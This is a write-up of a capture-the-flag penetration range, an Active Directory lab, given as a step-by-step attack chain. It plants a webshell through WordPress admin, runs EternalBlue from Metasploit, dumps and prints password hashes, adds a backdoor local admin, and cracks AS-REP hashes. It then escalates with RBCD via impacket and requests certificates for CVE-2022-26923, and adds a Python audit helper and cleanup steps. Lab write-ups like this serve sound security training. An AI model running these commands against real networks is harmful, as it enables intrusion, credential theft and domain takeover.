网鼎杯 (WangDing Cup) Semi-Final Penetration Range: Reproduction and Analysis

Topology

The network topology is as follows:

Host       IP address
WEB01      39.99.136.199 (public) / 172.22.15.26 (internal)
XR-WIN08   172.22.15.24
XR-0687    172.22.15.35
XR-DC01    172.22.15.13
XR-CA      172.22.15.48

The public address of WEB01 appears as 39.99.136.199, 39.99.224.45 and 39.99.131.228 at different points in this writeup; all of them refer to the same entry host, whose internal address 172.22.15.26 does not change. The internal scan below also finds XR-CA at 172.22.15.18 rather than the 172.22.15.48 listed here.

External foothold

Port scan with fscan:

39.99.224.45:22 open
39.99.224.45:80 open
http://39.99.224.45       code:200 len:39962  title:XIAORANG.LAB

dirsearch turns up the WordPress admin login, and the weak password works:
admin/123456

In the theme template editor, edit a template file of the active theme and drop a webshell into it.

Connect with AntSword (蚁剑); the shell comes online at:

http://39.99.131.228/wp-content/themes/twentytwentyone/404.php

Internal network penetration

First check the jump host's internal IP: 172.22.15.26
Scan its /24 with fscan:

(icmp) Target 172.22.15.26    is alive
(icmp) Target 172.22.15.24    is alive
(icmp) Target 172.22.15.13    is alive
(icmp) Target 172.22.15.35    is alive
(icmp) Target 172.22.15.18    is alive
[*] Icmp alive hosts len is: 5
172.22.15.24:3306 open
172.22.15.18:445 open
172.22.15.35:445 open
172.22.15.13:445 open
172.22.15.24:445 open
172.22.15.18:139 open
172.22.15.35:139 open
172.22.15.13:139 open
172.22.15.24:139 open
172.22.15.13:135 open
172.22.15.18:135 open
172.22.15.35:135 open
172.22.15.24:135 open
172.22.15.18:80 open
172.22.15.24:80 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.13:88 open
[*] alive ports len is: 18
start vulscan
[*] NetInfo 
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[*] NetInfo 
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] NetInfo 
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[*] NetInfo 
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[*] NetBios 172.22.15.35    XIAORANG\XR-0687              
[*] NetBios 172.22.15.13    [+] DC:XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[*] OsInfo 172.22.15.13 (Windows Server 2016 Standard 14393)
[+] MS17-010 172.22.15.24       (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.15.24       code:302 len:0      title:None redirect url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

Quick summary:

172.22.15.26  WEB01, entry host, already compromised
172.22.15.24  WORKGROUP\XR-WIN08 (Server 2008 R2, not domain-joined), /www/sys/index.php, MS17-010
172.22.15.13  DC: XR-DC01.xiaorang.lab (Server 2016)
172.22.15.35  XIAORANG\XR-0687
172.22.15.18  XR-CA.xiaorang.lab, AD CS web enrollment detected (active-directory-certsrv-detect)

EternalBlue on 172.22.15.24

Next, run the EternalBlue module from msf through the proxy on the jump host. The payload is a bind shell (windows/x64/meterpreter/bind_tcp) on purpose: we only reach the target through the SOCKS proxy, so the target cannot open a reverse connection back to us, whereas msf can connect out through the proxy to the port the payload listens on.

search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 172.22.15.24
run

Dump credentials

load kiwi
creds_all


Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
XR-WIN08$  WORKGROUP  (null)

kerberos credentials
====================

Username   Domain     Password
--------   ------     --------
(null)     (null)     (null)
xr-win08$  WORKGROUP  (null)

Nothing usable is in memory: the only entry is the local machine account, consistent with the host being in WORKGROUP rather than the domain. Dump the local SAM instead:

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

zdoo

Then visit the http://172.22.15.24/www/sys/index.php page found by the scan (a zdoo instance).
The weak password admin/123456 logs in, but nothing useful turns up in the application itself.

Add a local administrator on the Windows host to keep access:

load powershell
powershell_execute "net user qwq Qq123456. /add"
powershell_execute "net localgroup administrators qwq /add"

Log in over RDP and look around. If RDP errors out, see https://blog.csdn.net/juanjuan_01/article/details/127005255

Check the database credentials stored in phpstudy:

root/root@#123
zdoo/zdoo123

Export the user table (account names and password hashes) from the zdoo database; the account names are what go into the user.txt list used for AS-REP roasting below.

AS-REP Roasting

The first step of Kerberos authentication, pre-authentication, exists to stop offline brute-forcing of user passwords: the client has to prove it knows the user's key (by sending a timestamp encrypted with it) before the KDC hands anything back. If pre-authentication is disabled on an account ("Do not require Kerberos preauthentication"), anyone who can reach the KDC can send an AS-REQ naming that user, and the DC answers with an AS-REP containing a TGT plus an enc-part encrypted with the user's long-term key (for RC4-HMAC that key is the NT hash). That enc-part can be cracked offline; a successful guess yields the user's cleartext password. This is AS-REP Roasting, and it needs no credentials at all, only a list of candidate usernames.

First, test which of those users have Kerberos pre-authentication disabled (no domain credentials are needed, only the user list):

proxychains python3 GetNPUsers.py -dc-ip 172.22.15.13  -usersfile /home/kali/Desktop/user.txt  xiaorang.lab/

Two hashes come back. The KDC_ERR_C_PRINCIPAL_UNKNOWN line is the KDC's reply for a name from the list that does not exist in the domain; users that exist but still require pre-authentication produce no hash.

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

$krb5asrep$23$lixiuying@XIAORANG.LAB:ed86f768287f6a44cbb2885c01f0ad42$a1ac3ad734454fee6acb5d25bf9f62af558b200f9d29dbe1dbc8a52d02d83795961c48d696a352957d28b59508da600a3e7e1b6f46fc7b1de1b87e5bc2f4b9c16879dffd43b3c23f95654fd180173b10ec149eab923e442160c09aae74bb4680d973d71e7b702b64b271b0c1c6e07d032b46b616a2c9c21e9aa4f5ef2e05e346a1e85e68bbe6916dcb7e8f74d01554b08e9fa903f9011164aac11e28edba78381da7803cc6f036b2225f443d494cb7fc8f1918ccaa623d22276f999a9241ec847a4e888bf9d30f7d33fe256d5a65c75a3c885e79e58073455a70d8aecf27622b253bcf2532b874f299947140
$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0

Crack with hashcat (-m 18200 is Kerberos 5 AS-REP etype 23; the hash is passed inline here, but a hash file is easier when there are several):

hashcat -m 18200 --force -a 0 '$krb5asrep$23$huachunmei@XIAORANG.LAB:e9cf18d1fffc5ee6d45b88701de41307$10908e99ec8685c3f0eb59be023d694dbc6011f09035e2742ed211f4d2af28a7182dfbe56c3d9ee50c4b16b21d8ee024d4922fbf2ccb80e3f5138a27d37760505d3bbf0309718201afaaa61db178b96a0f653f74b560e41b8d1e0133434b630c3b90ad625de7f3555074918def7be06cb0b98bf91614641d06ed4e9c256b8cfb1294a0ba20990aceacf2d73d45e81ad73ba23ddd8aa20a02cdce349058bbe7480784810394952be6f9cf8b015f7eeb8df1db679312f4eed2023d4f522ebca11222bd85382a368cbf9d03df90f7d7f0941b25d24c54b95350ca3d0f6604f461cba04899704797dc298961c7b0' rockyou.txt

Both passwords are recovered, and they allow logging in to 172.22.15.35 (XR-0687):

lixiuying@XIAORANG.LAB     winniethepooh
huachunmei@XIAORANG.LAB  1qaz2wsx

Privilege escalation with RBCD (resource-based constrained delegation)

Collect the domain with BloodHound (as lixiuying):

proxychains4 -q python3 bloodhound.py -u lixiuying -p winniethepooh -d xiaorang.lab -dc XR-DC01.xiaorang.lab -c all --dns-tcp -ns 172.22.15.13 --auth-method ntlm --zip

BloodHound shows GenericWrite over the XR-0687$ computer object (the write below is done as lixiuying), which is enough for RBCD.

Adinfo_win.exe -d xiaorang.lab --dc 172.22.15.13 -u huachunmei -p  1qaz2wsx

Add a machine account (this works because the default MachineAccountQuota of 10 lets any domain user create up to ten computer objects):

proxychains4 -q impacket-addcomputer -computer-name 'EVILCOMPUTER$' -computer-pass '123@#ABC' -dc-host XR-DC01.xiaorang.lab -dc-ip 172.22.15.13 "xiaorang.lab/lixiuying:winniethepooh"

Configure RBCD: write EVILCOMPUTER$ into msDS-AllowedToActOnBehalfOfOtherIdentity on XR-0687$:

proxychains4 -q impacket-rbcd xiaorang.lab/lixiuying:winniethepooh -action write -delegate-from "EVILCOMPUTER$" -delegate-to "XR-0687$" -dc-ip 172.22.15.13

Request a service ticket for cifs/XR-0687.xiaorang.lab as EVILCOMPUTER$, impersonating Administrator (S4U2Self followed by S4U2Proxy):

proxychains4 -q impacket-getST xiaorang.lab/EVILCOMPUTER$:'123@#ABC' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

Import the ticket (use the file name getST prints in its "Saving ticket in" line; here it is Administrator.ccache, and the name is case-sensitive):

export KRB5CCNAME=Administrator.ccache

Pass the ticket: with the Administrator service ticket, psexec gives SYSTEM on the host

proxychains python3 psexec.py Administrator@XR-0687.xiaorang.lab -k -no-pass -dc-ip 172.22.15.13
or
proxychains4 -q impacket-psexec 'xiaorang.lab/administrator@XR-0687.xiaorang.lab' -target-ip 172.22.15.35 -codec gbk -no-pass -k

A shell comes back (psexec runs as SYSTEM).
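The impacket-rbcd write above stores a binary security descriptor in msDS-AllowedToActOnBehalfOfOtherIdentity on XR-0687$, and that attribute is exactly what a defender should audit after an exercise like this. The following is an added example (not part of the original writeup, and not impacket's code) that builds a descriptor of the same shape impacket-rbcd writes (owner and group BUILTIN\Administrators, one ACCESS_ALLOWED_ACE with the full-control mask 0xF01FF per delegating SID) and parses one back to list which SIDs may act on behalf of the host. The SID in the self-test is constructed; in the lab it would be the objectSid of EVILCOMPUTER$.

```python
import struct

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF              # the access mask impacket-rbcd grants (983551)
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-<authority>-<sub>...' as a binary SID: revision, count, 48-bit BE authority, LE subauthorities."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def sid_from_bytes(data: bytes) -> tuple:
    """Decode a binary SID; returns (sid_string, encoded_length)."""
    count = data[1]
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(allowed_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR whose DACL grants full control to each SID, laid out like impacket-rbcd."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        ace_size = 8 + len(sid_bytes)  # ACE header (4) + access mask (4) + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, ace_size, FULL_CONTROL) + sid_bytes
    dacl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces  # ACL_REVISION_DS = 4
    off_owner = 20                      # header: Revision, Sbz1, Control, four 32-bit offsets
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)  # SACL offset 0 = none
    return header + owner + owner + dacl


def allowed_to_act(descriptor: bytes) -> list:
    """Audit side: list the SIDs granted by the DACL of an msDS-AllowedToActOnBehalfOfOtherIdentity value."""
    revision, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if revision != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    pos, sids = off_dacl + 8, []
    for _ in range(ace_count):
        ace_type, _, ace_size, _mask = struct.unpack_from("<BBHI", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(sid_from_bytes(descriptor[pos + 8:pos + ace_size])[0])
        pos += ace_size
    return sids


# Constructed SID standing in for the objectSid of EVILCOMPUTER$ (not a value from the lab).
EVIL_SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"

if __name__ == "__main__":
    sd = build_rbcd_descriptor([EVIL_SID])
    print(len(sd), "bytes:", sd.hex())
    print("may act on behalf of XR-0687$:", allowed_to_act(sd))
```

To audit a real host, read the attribute (for example Get-ADComputer XR-0687 -Properties msDS-AllowedToActOnBehalfOfOtherIdentity from a domain-joined machine, or the raw LDAP value) and feed the bytes to allowed_to_act; any SID that is not a known front-end service account is a finding. Cleanup after the exercise is impacket-rbcd with -action remove (or flush) against XR-0687$, and deleting EVILCOMPUTER$.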

172.22.15.18 (XR-CA) is vulnerable to CVE-2022-26923

fscan flagged active-directory-certsrv-detect earlier.
Locate the certificate server and look for exploitable certificate templates with certipy:

proxychains4 -q certipy find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

The machine account being created successfully shows the vulnerability is present: CVE-2022-26923 abuses a machine account (TEST2$ in the request below) whose dNSHostName has been set to the DC's name, so that the Machine template issues a certificate in the DC's identity. Continue with the standard flow and request a certificate from the Machine template. One oddity: the first attempt timed out and the second went through, the same as with EternalBlue; most likely a quirk of the range environment.

proxychains certipy req -u 'TEST2$@xiaorang.lab' -p 'P@ssw0rd' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -template 'Machine'